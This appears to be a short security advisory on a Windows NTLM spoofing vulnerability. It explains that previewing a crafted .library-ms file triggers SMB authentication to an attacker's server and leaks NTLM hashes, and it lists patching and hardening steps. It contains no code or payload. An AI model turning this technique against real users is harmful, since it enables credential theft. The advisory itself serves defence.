**Name of the Vulnerable Software and Affected Versions:**

Microsoft Windows (affected versions not specified)

**Description:**

A vulnerability exists in the Windows NTLM (NT LAN Manager) protocol due to external control of file names or paths. This allows an unauthorized attacker to perform spoofing over a network. The vulnerability enables the theft of NTLM credentials with minimal user interaction, such as simply previewing a malicious file. Exploitation involves a crafted `.library-ms` file triggering SMB authentication to a controlled server, leading to NTLM hash leakage. This vulnerability is actively exploited in the wild, with campaigns targeting government and private organizations in multiple countries, including Poland, Romania, Russia, Bulgaria, the Netherlands, Australia, and Turkey. Approximately 10 attack campaigns have been observed as of late March 2025.

**Recommendations:**

Versions prior to the March 11, 2025 update are vulnerable.

* Apply the March 11, 2025, or later updates.

* Disable NTLM if it is not needed.

* Restrict access to the vulnerable module `File Explorer` to minimize the risk of exploitation.

* Monitor for suspicious SMB authentication requests.

* Audit file shares.